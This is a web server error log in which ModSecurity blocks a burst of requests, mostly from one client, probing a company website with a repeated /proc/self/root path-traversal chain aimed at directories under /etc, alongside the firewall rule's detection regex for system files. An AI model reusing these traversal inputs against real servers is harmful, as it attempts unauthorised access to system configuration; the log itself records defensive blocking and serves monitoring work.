[Tue Mar 17 20:35:22.462135 2026] [:error] [pid 2598:tid 140411691570944] [client 74.7.241.31:55548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlOhj0p0SRWAqcjGGe3wAAAwY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:23.794580 2026] [:error] [pid 25836:tid 140411590858496] [client 74.7.241.31:55554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlO4h-PF_25v4hFRCPUwAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:25.099416 2026] [:error] [pid 25836:tid 140411607643904] [client 74.7.241.31:55560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlPYh-PF_25v4hFRCPVAAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:26.398214 2026] [:error] [pid 25836:tid 140411548894976] [client 74.7.241.31:55564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlPoh-PF_25v4hFRCPVgAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:27.754929 2026] [:error] [pid 16449:tid 140411733534464] [client 74.7.241.31:51866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlP0eQbjTSjgbmHFr1PgAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:29.053489 2026] [:error] [pid 29151:tid 140411691570944] [client 74.7.241.31:51882] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlQfPqhzTj3BvfDX-tVgAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:32.060781 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.243.128:57710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlROw_le52K8_3pV1xnAAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:34.543364 2026] [:error] [pid 16449:tid 140411725141760] [client 74.7.241.31:51892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlRkeQbjTSjgbmHFr1RwAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:35.770753 2026] [:error] [pid 6296:tid 140411540502272] [client 74.7.241.31:51896] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlR3Ik7brgkOH-rIWxsgAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:37.042892 2026] [:error] [pid 11088:tid 140411599251200] [client 74.7.241.31:51906] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlSWmqtCojLHvu5cKOSwAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:38.314295 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:41164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlSuyqAr6etmhZHNpL0AAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:39.592542 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:41172] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlS9Y0UrI5A3LftIwkmgAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:41.331457 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:41188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlTeyqAr6etmhZHNpL0QAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:42.598070 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.241.31:41190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlTtY0UrI5A3LftIwkngAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:43.137791 2026] [proxy_fcgi:error] [pid 25836:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:56466] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:35:44.371417 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:41192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlUOyqAr6etmhZHNpL0gAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:45.661373 2026] [:error] [pid 6296:tid 140411725141760] [client 74.7.241.31:41198] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlUXIk7brgkOH-rIWxtQAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:46.964730 2026] [:error] [pid 11088:tid 140411691570944] [client 74.7.241.31:41202] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlUmmqtCojLHvu5cKOUAAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:48.236127 2026] [:error] [pid 25836:tid 140411658000128] [client 74.7.241.31:37014] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlVIh-PF_25v4hFRCPWAAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:49.531171 2026] [:error] [pid 11088:tid 140411699963648] [client 74.7.241.31:37030] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlVWmqtCojLHvu5cKOUQAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:50.867041 2026] [:error] [pid 2598:tid 140411649607424] [client 74.7.241.31:37036] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlVhj0p0SRWAqcjGGe5wAAAws"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:55.282995 2026] [:error] [pid 11088:tid 140411565680384] [client 74.7.241.31:37038] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlW2mqtCojLHvu5cKOVQAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:56.630282 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.241.31:37040] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlXMdf6f5d65gmYZRhxwAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
